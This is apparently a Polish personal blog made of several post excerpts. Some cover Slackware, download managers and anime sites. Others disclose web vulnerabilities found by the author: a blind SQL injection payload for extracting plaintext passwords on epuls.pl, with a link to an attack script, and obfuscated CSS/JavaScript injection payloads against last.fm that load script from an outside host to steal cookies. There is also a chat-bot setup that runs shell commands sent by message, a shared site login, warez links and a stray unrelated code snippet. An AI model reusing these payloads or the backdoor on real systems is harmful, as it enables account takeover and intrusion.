do nothing log

Epulsem miałem się już nie zajmować. Dostałem jednak maila o tym, że wprowadzone zostały nowe funkcje. Jak wiadomo, nowe funkcje to nowe błędy, nie mogłem więc takiej okazji przegapić.

Czytaj dalej ‘Epuls.pl odcinek II’

Zryczałtowane usługi są fajne, nieważne ile się korzysta, zawsze płaci się tyle samo. Podobnie jest z EraGG. Za cenę 1zł otrzymujemy tygodniowy dostęp do naszego gg z telefonu komorkowego. Niestety, na liście kontaktów możemy mieć tylko 20 użytkowników, a wiadomości muszą być krótsze niż 200 znaków. Ponadto jesteśmy zmuszeni do oglądania reklamy, której przypadkowe naciśnięcie kosztuje nas dodatkowe pieniądze.

Oczywiście nie musi tak być, można przecież stworzyć alternatywną aplikację kliencką! Czytaj dalej ‘EraGG’

Download manager w Firefoksie nie obsługuje ani wznawiania ściągania, ani jego akcerelacji. Wget nie potrafi dzielić pliku na części i nie obsługuje dynamicznej kolejki ściągania. Aget obsługuje akcereracje ale jest w wczesnej fazie rozwoju i nie obsługuje proxy. Czy użytkownicy Linuksa mogą tylko marzyc o funkcjonalności znanej z Flashgeta? otóż okazuje się, ze nie. Z pomocą przychodzi DownThemAll!

Czytaj dalej ‘DownThemAll!’

Po dwoch latach obcowania z Slackware 10.2 przyszedl czas na upgrade. Rozwazalem opcje uzywania Gentoo, lecz po miesiacu uzywania stwierdzilem, ze jest to wspaniala dystrybucja ale niestety do mnie nie pasuje (albo ja do niej). Tak wiec padlo na nowego Slacka.

Ogolne wrazenie:

Czytaj dalej ‘Slackware 12′

Po dwóch miesiącach wreszcie się doczekałem załatania dziury, którą
znalazłem w http://epuls.pl . Niestety mimo moich wielokrotnych prób
nie uzyskałem odpowiedzi od załogi epulsa.

Na czym polegala dziura?
Każdy użytkownik na epulsie tworzy własna stronę profilu. Do
dyspozycji ma kilka standardowych tagów formatowania tekstu oraz dwa
tagi, które wzbudziły moją uwagę: <link> oraz <club> . Pierwszy tworzy link do użytkownika, a drugi do
klubu. Jak się okazało oba te tagi były podatne na sql injection. Co mnie bardziej zaskoczylo to to ze hasla przechowywane sa w postaci niezaszyfrowanej. Kod:

<link>carmen’ and strPassword>’jakieshaslo’ #</link>

generował poprawny link jeśli hasło użytkownika carmen jest
leksykograficznie dalej niż ‘jakieshaslo’.
Przeszukując literka po literce można było bez problemu znaleźć hasło.

Teraz jeszcze filmik żeby nie było, że sobie zmyślam. (pozdrowienia
dla kolegi, który filmik nakręcil)

[14/02/2008]:
Tyle już otrzymałem próśb o filmik w lepszej wersji, że postanowiłem go wrzucić.
http://rapidshare.com/files/91783052/epuls.mov
Wrzucam też skrypt, o który prosiliście.
http://rapidshare.com/files/91786659/skrypt.tar.gz

Jeszcze przed wakacjami last.fm byl podatny na taki atak (lamania wiersza tylko dla czytelnosci):

[font=inherit;display:none;-moz-binding:
url('http://rotflcopter.rip3k.com/xssmoz.php#xss');][/font]

[font=inherit;background-image:url(javascript:
eval('%76%61%72%20%61%3D%64%6F%63%75%6D%65%6E%74
%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22
%73%63%72%69%70%74%22%29%3B%76%61%72%20%78%78%3D
%61%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%6F
%74%66%6C%63%6F%70%74%65%72%2E%72%69%70%33%6B%2E
%63%6F%6D%2F%6C%6F%6C%66%72%2E%70%68%70%22%3B%76
%61%72%20%79%3D%61%2E%74%79%70%65%3D%22%74%65%78
%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3B%76%61
%72%20%78%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74
%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D
%65%28%22%68%65%61%64%22%29%5B%30%5D%2E%61%70%70
%65%6E%64%43%68%69%6C%64%28%61%29%3B'));][/font]

public class Hello {
  public static void main(String[] args) {
    System.out.println("Hello World!");
  }
}

Pierwsza linijka byla przygotowana dla przegladarek na silniku gecko, druga dzialala na ie oraz operze. Byla to luka pozwalajaca na CSS injection, z ktorego dzieki specyficznymi dla przegladarek bugami mozna bylo zrobic Javascript injection. Stad juz krotka droga do przechwytywania ciasteczek i w rezultacie przejecia kontroli nad kontem.

oto dyskusja z obsluga

Czytaj dalej ‘Last.fm hack’

Podczas rozbierania laptopa zerwala sie tasma łaczaca ekranik z plyta glowna. Bede musial ja naprawic a jak na razie to zamiescilem krotki art o instalacji netbsd na tym urzadzonku.

  http://netbsd.pl

Ostatnio ogladalem duzo anime i znalazlem mnostwo stron z anime (no moze nie tak mnostwo ale idac linkami z tych stron ich ilosc rosnie wykladniczo ;] )

http://66.90.64.102/ uzytkownik NarutoALL haslo unitedtrans

http://www.narutochuushin.com potrzebna wlasna rejestracja

http://www.narutocommunity.net/ wspaniala strona, wspaniale forum, rejestracja

http://www.saiyanisland.com/ nowe odcinki w sredniej jakosci

http://realitylapse.com/ stad mialem prawie wszystkie odcinki naruto, ale ostatnio byly jakies problemy z serwerem w kazdym badz razie jesli dziala to polecam

http://www.muffindomain.com/

http://www.warez.ge/

http://free.hentaicenter.pl/ to juz calkiem przypadkiem tak sie znalazlo ;p

http://www.narutochaos.com/

Ekg kazdy uzytkownik linuksa pewnie zna. Ekg2 to niby jego nastepca. Postanowilem postawic bota na ekg2+screen ktory bedzie jakby backdoor'em do mojego shella. Udalo sie i bylo zadziwiajaco proste.

Po dostaniu wlasnego numerka odpalamy:

$screen ekg2

logujemy sie

/session -a gg:4*****8 gdzie 4*****8 to nasz numer

/session -s password haslo

/save

i teraz juz dlugo oczekiwana komenda

/on -a protocol-message 1 %1!=gg:4*****8&%1=gg:9*******1 exec -b %1 %4

gdzie  4*****8 to numer na ktorym stoi bot (ten sam co w session -a)

9*******1 to numer z ktorego bedziemy sie laczyc (ot takie zabezpieczenie aby ktos przypakiem nie skasowal nam calego katalogu domowego)

Voilla!